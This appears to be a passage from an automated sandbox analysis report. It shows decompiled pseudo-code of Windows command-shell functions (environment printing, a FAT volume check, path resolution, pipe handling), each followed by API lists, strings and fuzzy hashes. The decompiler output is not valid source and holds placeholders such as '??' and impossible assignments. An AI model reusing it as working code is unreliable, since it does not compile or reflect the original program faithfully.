                                                      						_t25 =  &(_t25[1]);
                                                      					} while (_t50 != 0);
                                                      					_t28 = _t25 - _t62 >> 1;
                                                      					if(_t25 - _t62 >> 1 == 2) {
                                                      						if(_t42[1] != 0x3a) {
                                                      							goto L20;
                                                      						} else {
                                                      							_t28 = iswalpha(_t57);
                                                      							_pop(_t50);
                                                      							if(_t28 == 0) {
                                                      								goto L20;
                                                      							} else {
                                                      								E4A732C56(_t42, _t57, _t58,  &_v528, 0x104,  *_t42 & 0x0000ffff);
                                                      								_push( &_v528);
                                                      								goto L7;
                                                      							}
                                                      						}
                                                      					} else {
                                                      						L20:
                                                      						 *0x4a754188 = E4A740511(_t28, _t50, _t58, _t42);
                                                      					}
                                                      				} else {
                                                      					_t62 = 0x4a755260;
                                                      					E4A732C56(_t42, _t57, _t58, 0x4a755260, 0x104, 0);
                                                      					_push(0x4a755260);
                                                      					L7:
                                                      					_push(L"%s\r\n");
                                                      					E4A7358F3();
                                                      					 *0x4a754188 =  *0x4a754188 & 0x00000000;
                                                      				}
                                                      				return E4A7313A9(0, _t42, _v8 ^ _t66, _t57, _t58, _t62);
                                                      			}

                                                      APIs
                                                        • Part of subcall function 4A7322CA: iswspace.MSVCRT ref: 4A73238B
                                                      • iswspace.MSVCRT ref: 4A7404BD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: iswspace
                                                      • String ID: %s$:
                                                      • API String ID: 2389812497-2429078054
                                                      • Opcode ID: 2e58908be42baeb46cd2b6bf59ac038c20ca0b90e23ff1276c25f320130b4625
                                                      • Instruction ID: 8fdeeb53a1a78dd5005eea1216bd9246445d7739c6749b20ae2478df74b14736
                                                      • Opcode Fuzzy Hash: 2e58908be42baeb46cd2b6bf59ac038c20ca0b90e23ff1276c25f320130b4625
                                                      • Instruction Fuzzy Hash: 02313AB1959622ABE7709F68CC856E63BBCDF07310F124465E581CB043F6B4C54EC794
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 4A732D9B: iswspace.MSVCRT ref: 4A732DAD
                                                      • iswspace.MSVCRT ref: 4A7359FE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: iswspace
                                                      • String ID: off
                                                      • API String ID: 2389812497-733764931
                                                      • Opcode ID: 1f7b176a39327a2886bddce40ec9c5dfe660011e6a176fd4c899560e1ad8807c
                                                      • Instruction ID: 5357c997d44ab4a1057696ba92164830c35756ed826075440e9838b5481ce1e1
                                                      • Opcode Fuzzy Hash: 1f7b176a39327a2886bddce40ec9c5dfe660011e6a176fd4c899560e1ad8807c
                                                      • Instruction Fuzzy Hash: E211993252DE24BEE3709A118C86B872F58DB8D571F134426FA46AA083E5618A8CC3E0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 77%
                                                      			E4A73A1FA(void* __ebx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                      				signed int _v8;
                                                      				short _v532;
                                                      				char _v1056;
                                                      				short _v1580;
                                                      				long _v1584;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t14;
                                                      				void* _t18;
                                                      				long _t29;
                                                      				WCHAR* _t30;
                                                      				void* _t31;
                                                      				void* _t37;
                                                      				signed int _t40;
                                                      
                                                      				_t31 = __ebx;
                                                      				_t14 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t14 ^ _t40;
                                                      				 *0x4a754128 = 0;
                                                      				if(E4A73A2C1(_t37, _a4, _a8,  &_v1056, 0x106) == 0) {
                                                      					L3:
                                                      					_t18 = 0;
                                                      					L4:
                                                      					return E4A7313A9(_t18, _t31, _v8 ^ _t40, _t37, 0, 0x106);
                                                      				}
                                                      				E4A73185A( &_v532, 0x106,  &_v1056);
                                                      				E4A7320A9(0x106,  &_v532, 0x106, E4A732EC8);
                                                      				if(GetVolumeInformationW( &_v532, 0, 0, 0,  &_v1584, 0,  &_v1580, 0x106) == 0) {
                                                      					_t29 = GetLastError();
                                                      					 *0x4a754128 = _t29;
                                                      					if(_t29 == 0x90) {
                                                      						 *0x4a754128 = 0;
                                                      					}
                                                      					goto L3;
                                                      				}
                                                      				_t30 =  &_v1580;
                                                      				__imp___wcsicmp(_t30, "FAT");
                                                      				if(_t30 == 0) {
                                                      					if(_v1584 != 0xc) {
                                                      						goto L3;
                                                      					}
                                                      					_t18 = 1;
                                                      					goto L4;
                                                      				}
                                                      				goto L3;
                                                      			}

                                                      APIs
                                                        • Part of subcall function 4A73A2C1: towupper.MSVCRT ref: 4A73A346
                                                      • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,00000106,?,00000106,4A732EC8,?,00000106,?,00000000,00000000), ref: 4A73A276
                                                      • _wcsicmp.MSVCRT ref: 4A73A290
                                                      • GetLastError.KERNEL32 ref: 4A74AA10
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: ErrorInformationLastVolume_wcsicmptowupper
                                                      • String ID: FAT
                                                      • API String ID: 206573626-238207945
                                                      • Opcode ID: 76c4871d096e9dcd9472cc6388ba1e2ba43f7f7b22b05f0db3662bfcd5fd57be
                                                      • Instruction ID: 6412f1ce62e3a01e465db44ee405bb5c48777af7b431d8da85711b859e8c8138
                                                      • Opcode Fuzzy Hash: 76c4871d096e9dcd9472cc6388ba1e2ba43f7f7b22b05f0db3662bfcd5fd57be
                                                      • Instruction Fuzzy Hash: 4221C6B2949518AECB70CB61CC49DDB7BBCEBDA320F4240A9E505D7401DA32DA4CCB64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 95%
                                                      			E4A74C936(intOrPtr* _a4) {
                                                      				intOrPtr* _t7;
                                                      				signed int _t9;
                                                      				void* _t12;
                                                      				intOrPtr* _t13;
                                                      				intOrPtr _t21;
                                                      				intOrPtr _t22;
                                                      				void* _t25;
                                                      				intOrPtr* _t26;
                                                      				signed int _t28;
                                                      
                                                      				_t26 = _a4;
                                                      				if(_t26 != 0) {
                                                      					_t7 = _t26;
                                                      					_t25 = _t7 + 2;
                                                      					do {
                                                      						_t21 =  *_t7;
                                                      						_t7 = _t7 + 2;
                                                      					} while (_t21 != 0);
                                                      					while(1) {
                                                      						_t9 = _t7 - _t25;
                                                      						_t28 = _t9 >> 1;
                                                      						if(_t9 == 0) {
                                                      							break;
                                                      						}
                                                      						if( *0x4a7541b4 != 0) {
                                                      							_t12 = 1;
                                                      							L12:
                                                      							return _t12;
                                                      						}
                                                      						if( *_t26 != 0x3d) {
                                                      							E4A7358F3(L"%s\r\n", _t26);
                                                      						}
                                                      						_t26 = _t26 + 2 + _t28 * 2;
                                                      						_t13 = _t26;
                                                      						_t25 = _t13 + 2;
                                                      						do {
                                                      							_t22 =  *_t13;
                                                      							_t13 = _t13 + 2;
                                                      						} while (_t22 != 0);
                                                      					}
                                                      					_t12 = 0;
                                                      					goto L12;
                                                      				}
                                                      				_push("Null environment");
                                                      				fprintf(__imp___iob + 0x40, "\nCMD Internal Error %s\n");
                                                      				return 1;
                                                      			}













                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: fprintf
                                                      • String ID: CMD Internal Error %s$%s$Null environment
                                                      • API String ID: 383729395-2781220306
                                                      • Opcode ID: 2795cfd8dfd545ad1f74748c0088f092dae200d51f556eec2872332c5de8a063
                                                      • Instruction ID: f60b3768b03c1901a5d043a4798995d154c1b01f85ff13dd6d2838a350a5bb54
                                                      • Opcode Fuzzy Hash: 2795cfd8dfd545ad1f74748c0088f092dae200d51f556eec2872332c5de8a063
                                                      • Instruction Fuzzy Hash: 1D014C7724D142FAD7B057549804A933FB8EBCA3A3B068221E452DF240FA70D50DC7D0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 88%
                                                      			E4A741CA5(signed int __ecx, intOrPtr* __edx, long _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                      				signed int _v8;
                                                      				short _v528;
                                                      				WCHAR* _v532;
                                                      				signed int _v536;
                                                      				void* _v540;
                                                      				intOrPtr _v548;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t97;
                                                      				intOrPtr _t99;
                                                      				WCHAR* _t101;
                                                      				WCHAR* _t105;
                                                      				WCHAR* _t106;
                                                      				signed int _t109;
                                                      				signed int _t115;
                                                      				void* _t118;
                                                      				void* _t122;
                                                      				void* _t125;
                                                      				void* _t129;
                                                      				WCHAR* _t133;
                                                      				signed int _t136;
                                                      				void _t140;
                                                      				intOrPtr* _t145;
                                                      				void* _t152;
                                                      				intOrPtr* _t155;
                                                      				intOrPtr* _t159;
                                                      				void _t164;
                                                      				signed int _t167;
                                                      				void* _t179;
                                                      				short* _t180;
                                                      				WCHAR* _t185;
                                                      				void* _t188;
                                                      				short* _t190;
                                                      				void* _t191;
                                                      				short _t193;
                                                      				intOrPtr* _t194;
                                                      				void _t201;
                                                      				void _t202;
                                                      				short _t203;
                                                      				void* _t204;
                                                      				void* _t210;
                                                      				void* _t211;
                                                      				intOrPtr* _t212;
                                                      				intOrPtr* _t217;
                                                      				signed int _t219;
                                                      				short _t221;
                                                      				short _t222;
                                                      				short* _t223;
                                                      				void* _t224;
                                                      				short* _t225;
                                                      				void* _t226;
                                                      				intOrPtr _t227;
                                                      				void* _t228;
                                                      				void* _t229;
                                                      				void* _t230;
                                                      				void* _t231;
                                                      				signed int _t238;
                                                      
                                                      				_t220 = __edx;
                                                      				_t189 = __ecx;
                                                      				_t97 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t97 ^ _t238;
                                                      				_t99 = _a8;
                                                      				_v536 = _v536 & 0x00000000;
                                                      				_t185 = _a12;
                                                      				_t232 = _a4;
                                                      				_t229 =  *(_t99 + 0x20);
                                                      				_v548 = _t99;
                                                      				_v532 = _t185;
                                                      				_v540 = _t229;
                                                      				if(_t229 == 0) {
                                                      					E4A73185A(_t185, _a16, 0x4a755260);
                                                      					_t101 = _t185;
                                                      					_t190 =  &(_t101[1]);
                                                      					do {
                                                      						_t221 =  *_t101;
                                                      						_t101 =  &(_t101[1]);
                                                      					} while (_t221 != 0);
                                                      					_t222 =  *0x4a770664; // 0x5c
                                                      					_t105 =  &(_t185[_t101 - _t190 >> 1]);
                                                      					_t191 = _t185;
                                                      					if(_t185 >= _t105) {
                                                      						L24:
                                                      						 *_t105 = _t222;
                                                      						_t105[1] = 0;
                                                      						L25:
                                                      						if(( *(_t232 + 0x1c) & 0x00000200) == 0) {
                                                      							L38:
                                                      							_t106 = _t185;
                                                      							_t223 =  &(_t106[1]);
                                                      							do {
                                                      								_t193 =  *_t106;
                                                      								_t106 =  &(_t106[1]);
                                                      							} while (_t193 != 0);
                                                      							_t220 =  *((intOrPtr*)(_t232 + 0x18)) + 0x2c;
                                                      							_t194 = _t220;
                                                      							_t109 = _t106 - _t223 >> 1;
                                                      							_t232 = _t194 + 2;
                                                      							do {
                                                      								_t229 =  *_t194;
                                                      								_t194 = _t194 + 2;
                                                      							} while (_t229 != 0);
                                                      							if((_t194 - _t232 >> 1) + _t109 + 1 > 0x104) {
                                                      								goto L74;
                                                      							}
                                                      							_push(_t220);
                                                      							goto L44;
                                                      						} else {
                                                      							_t229 =  *((intOrPtr*)(_t232 + 0x18)) + 0x234;
                                                      							_t125 = _t229;
                                                      							_t224 = _t125 + 2;
                                                      							do {
                                                      								_t201 =  *_t125;
                                                      								_t125 = _t125 + 2;
                                                      							} while (_t201 != 0);
                                                      							if(_t125 == _t224) {
                                                      								goto L38;
                                                      							}
                                                      							_t129 = _t229;
                                                      							_t220 = _t129 + 2;
                                                      							do {
                                                      								_t202 =  *_t129;
                                                      								_t129 = _t129 + 2;
                                                      							} while (_t202 != 0);
                                                      							if(_t129 == _t220) {
                                                      								L74:
                                                      								_v536 = 1;
                                                      								L6:
                                                      								if(_a20 == 0) {
                                                      									L10:
                                                      									return E4A7313A9(_v536, _t185, _v8 ^ _t238, _t220, _t229, _t232);
                                                      								}
                                                      								_t200 = _v540;
                                                      								if(_t200 == 0 || ( *(_t200 + 0x1c) & 0x00002000) == 0) {
                                                      									_t200 = _v548;
                                                      									if(( *(_v548 + 0x1c) & 0x00002000) != 0) {
                                                      										goto L75;
                                                      									}
                                                      								} else {
                                                      									L75:
                                                      									_t229 = CreateFileW(_t185, 0x80000000, 1, 0, 3, 0x80, 0);
                                                      									if(_t229 != 0xffffffff) {
                                                      										_t115 = GetFileType(_t229);
                                                      										asm("sbb esi, esi");
                                                      										_t232 =  ~((_t115 & 0xffff7fff) - 1) + 1;
                                                      										CloseHandle(_t229);
                                                      										if( ~((_t115 & 0xffff7fff) - 1) + 1 != 0) {
                                                      											_t118 = E4A74FE1B(_t185, _t200, _t220, _t229, _t185, 0x400023d3, 0x400023d4);
                                                      											if(_t118 == 0) {
                                                      												 *_t185 = 0;
                                                      											} else {
                                                      												if(_t118 == 0) {
                                                      													_t122 = _v540;
                                                      													if(_t122 == 0) {
                                                      														_t122 = _v548;
                                                      													}
                                                      													 *(_t122 + 0x1c) =  *(_t122 + 0x1c) & 0xffffdfff;
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      								goto L10;
                                                      							}
                                                      							_t133 = _t185;
                                                      							_t225 =  &(_t133[1]);
                                                      							do {
                                                      								_t203 =  *_t133;
                                                      								_t133 =  &(_t133[1]);
                                                      							} while (_t203 != 0);
                                                      							_t204 = _t229;
                                                      							_t136 = _t133 - _t225 >> 1;
                                                      							_t220 = _t204 + 2;
                                                      							do {
                                                      								_t232 =  *_t204;
                                                      								_t204 = _t204 + 2;
                                                      							} while (_t232 != 0);
                                                      							if((_t204 - _t220 >> 1) + _t136 + 1 > 0x104) {
                                                      								goto L74;
                                                      							}
                                                      							_push(_t229);
                                                      							L44:
                                                      							_push(_a16);
                                                      							_push(_t185);
                                                      							E4A7320A9(_t232);
                                                      							goto L6;
                                                      						}
                                                      					} else {
                                                      						goto L19;
                                                      					}
                                                      					do {
                                                      						L19:
                                                      						if( *_t191 == _t222) {
                                                      							_t229 = _t191;
                                                      						}
                                                      						_t191 = _t191 + 2;
                                                      					} while (_t191 < _t105);
                                                      					if(_t229 == 0 || _t229 < _t105 - 2) {
                                                      						goto L24;
                                                      					} else {
                                                      						goto L25;
                                                      					}
                                                      				}
                                                      				if( *((short*)(E4A732ED1( *_t229))) == 0x3a) {
                                                      					if(( *(_t232 + 0x1c) & 0x00000200) == 0) {
                                                      						L59:
                                                      						_t186 =  *_v540;
                                                      						_t140 =  *_v540;
                                                      						_t226 = _t140 + 2;
                                                      						do {
                                                      							_t210 =  *_t140;
                                                      							_t140 = _t140 + 2;
                                                      						} while (_t210 != 0);
                                                      						_t229 = _t140 - _t226 >> 1;
                                                      						_t145 =  *((intOrPtr*)(_t232 + 0x18)) + 0x2c;
                                                      						_t211 = _t145 + 2;
                                                      						do {
                                                      							_t220 =  *_t145;
                                                      							_t145 = _t145 + 2;
                                                      						} while (_t220 != 0);
                                                      						if((_t145 - _t211 >> 1) + _t229 + 1 > 0x104) {
                                                      							L58:
                                                      							_t185 = _v532;
                                                      							goto L74;
                                                      						}
                                                      						E4A73185A(_v532, _a16, _t186);
                                                      						_t152 =  *((intOrPtr*)(_t232 + 0x18)) + 0x2c;
                                                      						L65:
                                                      						E4A7320A9(_t232, _v532, _a16, _t152);
                                                      						_t185 = _v532;
                                                      						goto L6;
                                                      					}
                                                      					_t212 =  *((intOrPtr*)(_t232 + 0x18)) + 0x234;
                                                      					_t155 = _t212;
                                                      					_t230 = _t155 + 2;
                                                      					do {
                                                      						_t227 =  *_t155;
                                                      						_t155 = _t155 + 2;
                                                      					} while (_t227 != 0);
                                                      					if(_t155 == _t230) {
                                                      						goto L59;
                                                      					}
                                                      					_t159 = _t212;
                                                      					_t229 = _t159 + 2;
                                                      					do {
                                                      						_t220 =  *_t159;
                                                      						_t159 = _t159 + 2;
                                                      					} while (_t220 != 0);
                                                      					if(_t159 == _t229) {
                                                      						goto L58;
                                                      					}
                                                      					_t187 =  *_v540;
                                                      					_t164 =  *_v540;
                                                      					_t231 = _t164 + 2;
                                                      					do {
                                                      						_t228 =  *_t164;
                                                      						_t164 = _t164 + 2;
                                                      					} while (_t228 != 0);
                                                      					_t167 = _t164 - _t231 >> 1;
                                                      					_t220 = _t212 + 2;
                                                      					do {
                                                      						_t229 =  *_t212;
                                                      						_t212 = _t212 + 2;
                                                      					} while (_t229 != 0);
                                                      					if((_t212 - _t220 >> 1) + _t167 + 1 > 0x104) {
                                                      						goto L58;
                                                      					}
                                                      					E4A73185A(_v532, _a16, _t187);
                                                      					_t152 =  *((intOrPtr*)(_t232 + 0x18)) + 0x234;
                                                      					goto L65;
                                                      				}
                                                      				if(_a20 == 0 ||  *((short*)(E4A732ED1( *_t229))) != 0x2a ||  *((short*)(E4A742348( *_t229))) != 0x5c) {
                                                      					L4:
                                                      					_t185 = _v532;
                                                      					if(E4A741D9B(_t189, _t185, _a16,  *_v540,  *((intOrPtr*)(_t232 + 4))) != 0) {
                                                      						E4A74056B(_t172);
                                                      						_v536 = 1;
                                                      					}
                                                      					_t232 = 0x104;
                                                      					if(GetFullPathNameW(_t185, 0x104,  &_v528, 0) > 0x104) {
                                                      						E4A74056B(0x6f);
                                                      						goto L74;
                                                      					} else {
                                                      						goto L6;
                                                      					}
                                                      				} else {
                                                      					_t179 = E4A732148( *((intOrPtr*)(_t232 + 4)), 0x5c);
                                                      					if(_t179 == 0) {
                                                      						_t180 =  *((intOrPtr*)(_t232 + 4));
                                                      						if( *((short*)(_t180 + 2)) == 0x3a) {
                                                      							_t180 = _t180 + 4;
                                                      						}
                                                      					} else {
                                                      						_t180 = _t179 + 2;
                                                      					}
                                                      					if(( *(_t232 + 0x1c) & 0x00000200) != 0) {
                                                      						_t220 = 0x234;
                                                      						_t217 =  *((intOrPtr*)(_t232 + 0x18)) + 0x234;
                                                      						_t188 = _t217 + 2;
                                                      						do {
                                                      							_t229 =  *_t217;
                                                      							_t217 = _t217 + 2;
                                                      						} while (_t229 != 0);
                                                      						_t219 = _t217 - _t188;
                                                      						_t189 = _t219 >> 1;
                                                      						if(_t219 != 0) {
                                                      							_t189 = 0;
                                                      							 *_t180 = 0;
                                                      							E4A7320A9(_t232,  *((intOrPtr*)(_t232 + 4)),  *((intOrPtr*)(_t232 + 8)),  *((intOrPtr*)(_t232 + 0x18)) + 0x234);
                                                      						}
                                                      					}
                                                      					goto L4;
                                                      				}
                                                      			}





























































                                                      0x4a7488f0
                                                      0x4a748aef
                                                      0x4a748aef
                                                      0x4a741d52
                                                      0x4a741d56
                                                      0x4a741d7f
                                                      0x4a741d93
                                                      0x4a741d93
                                                      0x4a741d58
                                                      0x4a741d65
                                                      0x4a741d70
                                                      0x4a741d79
                                                      0x00000000
                                                      0x00000000
                                                      0x4a748afe
                                                      0x4a748afe
                                                      0x4a748b17
                                                      0x4a748b1c
                                                      0x4a748b23
                                                      0x4a748b34
                                                      0x4a748b37
                                                      0x4a748b38
                                                      0x4a748b40
                                                      0x4a748b56
                                                      0x4a748b59
                                                      0x4a748b81
                                                      0x4a748b5b
                                                      0x4a748b5d
                                                      0x4a748b63
                                                      0x4a748b6b
                                                      0x4a748b6d
                                                      0x4a748b6d
                                                      0x4a748b73
                                                      0x4a748b73
                                                      0x4a748b5d
                                                      0x4a748b59
                                                      0x4a748b40
                                                      0x4a748b1c
                                                      0x00000000
                                                      0x4a741d65
                                                      0x4a7488f6
                                                      0x4a7488f8
                                                      0x4a7488fb
                                                      0x4a7488fb
                                                      0x4a7488ff
                                                      0x4a748900
                                                      0x4a748907
                                                      0x4a748909
                                                      0x4a74890b
                                                      0x4a74890e
                                                      0x4a74890e
                                                      0x4a748912
                                                      0x4a748913
                                                      0x4a748925
                                                      0x00000000
                                                      0x00000000
                                                      0x4a74892b
                                                      0x4a74896a
                                                      0x4a74896a
                                                      0x4a74896d
                                                      0x4a74896e
                                                      0x00000000
                                                      0x4a74896e
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x4a748895
                                                      0x4a748895
                                                      0x4a748898
                                                      0x4a74889a
                                                      0x4a74889a
                                                      0x4a74889d
                                                      0x4a74889e
                                                      0x4a7488a4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x4a7488a4
                                                      0x4a741cf5
                                                      0x4a74897f
                                                      0x4a748a13
                                                      0x4a748a19
                                                      0x4a748a1b
                                                      0x4a748a1d
                                                      0x4a748a20
                                                      0x4a748a20
                                                      0x4a748a24
                                                      0x4a748a25
                                                      0x4a748a2e
                                                      0x4a748a33
                                                      0x4a748a36
                                                      0x4a748a39
                                                      0x4a748a39
                                                      0x4a748a3d
                                                      0x4a748a3e
                                                      0x4a748a50
                                                      0x4a748a08
                                                      0x4a748a08
                                                      0x00000000
                                                      0x4a748a08
                                                      0x4a748a5c
                                                      0x4a748a64
                                                      0x4a748a67
                                                      0x4a748a71
                                                      0x4a748a76
                                                      0x00000000
                                                      0x4a748a76
                                                      0x4a748988
                                                      0x4a74898e
                                                      0x4a748990
                                                      0x4a748993
                                                      0x4a748993
                                                      0x4a748997
                                                      0x4a748998
                                                      0x4a7489a1
                                                      0x00000000
                                                      0x00000000
                                                      0x4a7489a3
                                                      0x4a7489a5
                                                      0x4a7489a8
                                                      0x4a7489a8
                                                      0x4a7489ac
                                                      0x4a7489ad
                                                      0x4a7489b6
                                                      0x00000000
                                                      0x00000000
                                                      0x4a7489be
                                                      0x4a7489c0
                                                      0x4a7489c2
                                                      0x4a7489c5
                                                      0x4a7489c5
                                                      0x4a7489c9
                                                      0x4a7489ca
                                                      0x4a7489d1
                                                      0x4a7489d3
                                                      0x4a7489d6
                                                      0x4a7489d6
                                                      0x4a7489da
                                                      0x4a7489db
                                                      0x4a7489ed
                                                      0x00000000
                                                      0x00000000
                                                      0x4a7489f9
                                                      0x4a748a01
                                                      0x00000000
                                                      0x4a748a01
                                                      0x4a741cff
                                                      0x4a741d12
                                                      0x4a741d1d
                                                      0x4a741d2e
                                                      0x4a748ad4
                                                      0x4a748ad9
                                                      0x4a748ad9
                                                      0x4a741d3d
                                                      0x4a741d4c
                                                      0x4a748aea
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x4a74231d
                                                      0x4a742322
                                                      0x4a742329
                                                      0x4a748a81
                                                      0x4a748a89
                                                      0x4a748a8f
                                                      0x4a748a8f
                                                      0x4a74232f
                                                      0x4a742330
                                                      0x4a742330
                                                      0x4a742338
                                                      0x4a748a9a
                                                      0x4a748a9f
                                                      0x4a748aa1
                                                      0x4a748aa4
                                                      0x4a748aa4
                                                      0x4a748aa8
                                                      0x4a748aa9
                                                      0x4a748aae
                                                      0x4a748ab0
                                                      0x4a748ab2
                                                      0x4a748ab8
                                                      0x4a748aba
                                                      0x4a748ac9
                                                      0x4a748ac9
                                                      0x4a748ab2
                                                      0x00000000
                                                      0x4a742338

                                                      APIs
                                                      • GetFullPathNameW.KERNEL32(?,00000104,?,00000000,?,00000000,?,?,?,00000000,00000104,?), ref: 4A741D44
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: FullNamePath
                                                      • String ID:
                                                      • API String ID: 608056474-0
                                                      • Opcode ID: 4414b4593afb1d749c98e5e71e7f3fc2346c5d81825c65d567a94f69ba702faf
                                                      • Instruction ID: 48317346f77df8761a3bfa2b914fd8741b18bf2fb7c37f272cdbfc8382ac49b7
                                                      • Opcode Fuzzy Hash: 4414b4593afb1d749c98e5e71e7f3fc2346c5d81825c65d567a94f69ba702faf
                                                      • Instruction Fuzzy Hash: 8DC15731604A0ADBD775DF18C888BE67BB5EF04344F0645A8D946DB262DB74EA4DCB80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 73%
                                                      			E4A73CBC3(void* __edx, char _a4) {
                                                      				void* _v8;
                                                      				void* _v12;
                                                      				short _v16;
                                                      				struct _CONSOLE_SCREEN_BUFFER_INFO _v28;
                                                      				void* __ebx;
                                                      				struct _CONSOLE_SCREEN_BUFFER_INFO* __ecx;
                                                      				void* __edi;
                                                      				void** __esi;
                                                      				char _t39;
                                                      				intOrPtr _t41;
                                                      				intOrPtr _t45;
                                                      				intOrPtr _t55;
                                                      
                                                      				_push(_t48);
                                                      				_t39 = _a4;
                                                      				_t45 =  *((intOrPtr*)(_t39 + 0x38));
                                                      				_v12 =  *((intOrPtr*)(_t39 + 0x3c));
                                                      				_t41 = E4A731896(0x28);
                                                      				_t55 = _t41;
                                                      				if(_t55 == 0) {
                                                      					L24:
                                                      					goto L21;
                                                      				} else {
                                                      					__imp___pipe(__esi, 0, 0x8000);
                                                      					__esp = __esp + 0xc;
                                                      					__eflags = __eax;
                                                      					if(__eax != 0) {
                                                      						_push(0);
                                                      						__eax = E4A736D44(__ecx);
                                                      						__ecx = 8;
                                                      						_pop(__ecx);
                                                      						goto L24;
                                                      					} else {
                                                      						E4A733B3E( *__esi) = E4A733B3E(__esi[1]);
                                                      						__eax =  *0x4a754184; // 0x0
                                                      						 *0x4a754184 =  *0x4a754184 + 1;
                                                      						__eflags = __eax;
                                                      						if(__eax != 0) {
                                                      							__eax =  *0x4a75410c; // 0x0
                                                      							 *(__eax + 0x24) = __esi;
                                                      							__eax =  *0x4a75410c; // 0x0
                                                      							__esi[8] = __eax;
                                                      							__esi[9] = 0;
                                                      							 *0x4a75410c = __esi;
                                                      						} else {
                                                      							 *0x4a75410c = __esi;
                                                      							 *0x4a754108 = __esi;
                                                      							__esi[8] = 0;
                                                      						}
                                                      						__eax = E4A734794(__eax, 1);
                                                      						__esi[3] = __eax;
                                                      						__eflags = __eax - 0xffffffff;
                                                      						if(__eax == 0xffffffff) {
                                                      							__esi[3] = __esi[3] | __eax;
                                                      							__eax = E4A74EA5F(__ecx, __edi, __esi);
                                                      						}
                                                      						__eax = E4A7346D3(__eax, __esi[1], 1);
                                                      						__eflags = __eax - 0xffffffff;
                                                      						if(__eax == 0xffffffff) {
                                                      							__eax = E4A74EA5F(__ecx, __edi, __esi);
                                                      						}
                                                      						__eax = E4A733AB3(__esi[1]);
                                                      						__esi[1] = __edi;
                                                      						__eflags =  *__ebx - __edi;
                                                      						if( *__ebx <= __edi) {
                                                      							 &_a4 = E4A7341DD(__ebx,  &_a4);
                                                      						}
                                                      						__eax = E4A731492(1, __ebx);
                                                      						_v8 = __eax;
                                                      						__eflags =  *0x4a754180 - __edi; // 0x0
                                                      						if(__eflags != 0) {
                                                      							__imp___get_osfhandle( *__esi, __edi, __edi, __edi, __edi, 1);
                                                      							_pop(__ecx);
                                                      							__eax = DuplicateHandle( *0x4a754180, __eax, ??, ??, ??, ??, ??);
                                                      						}
                                                      						__eax = E4A7346D3(__eax, __esi[3], 1);
                                                      						__ebx = __ebx | 0xffffffff;
                                                      						__eflags = __eax - __ebx;
                                                      						if(__eax == __ebx) {
                                                      							__eax = E4A74EA5F(__ecx, __edi, __esi);
                                                      						}
                                                      						__eax = E4A733AB3(__esi[3]);
                                                      						__esi[3] = __edi;
                                                      						__eflags = _v8 - __edi;
                                                      						if(_v8 != __edi) {
                                                      							 *0x4a770908 = 2;
                                                      							__eax = E4A74FCA6(__ebx, __ecx, __edx, __edi, __esi);
                                                      						}
                                                      						__eax =  *0x4a754180; // 0x0
                                                      						__esi[4] = __eax;
                                                      						__eax =  *0x4a7541bc; // 0x0
                                                      						__esi[6] = __eax;
                                                      						 *0x4a754180 = __edi;
                                                      						 *0x4a7541bc = __edi;
                                                      						__eax = E4A734794(__eax, __edi);
                                                      						__esi[2] = __eax;
                                                      						__eflags = __eax - __ebx;
                                                      						if(__eax == __ebx) {
                                                      							__esi[2] = __ebx;
                                                      							__eax = E4A74EA5F(__ecx, __edi, __esi);
                                                      						}
                                                      						__eax = E4A7346D3(__eax,  *__esi, __edi);
                                                      						__eflags = __eax - __ebx;
                                                      						if(__eax == __ebx) {
                                                      							__eax = E4A74EA5F(__ecx, __edi, __esi);
                                                      						}
                                                      						__eax = E4A733AB3( *__esi);
                                                      						__ebx = _v12;
                                                      						 *__esi = __edi;
                                                      						__eflags =  *__ebx - __edi;
                                                      						if( *__ebx <= __edi) {
                                                      							 &_a4 = E4A7341DD(__ebx,  &_a4);
                                                      						}
                                                      						__eax = E4A731492(1, __ebx);
                                                      						__ebx = __eax;
                                                      						__eax = E4A7346D3(__eax, __esi[2], __edi);
                                                      						__eflags = __eax - 0xffffffff;
                                                      						if(__eax == 0xffffffff) {
                                                      							__eax = E4A74EA5F(__ecx, __edi, __esi);
                                                      						}
                                                      						__eax = E4A733AB3(__esi[2]);
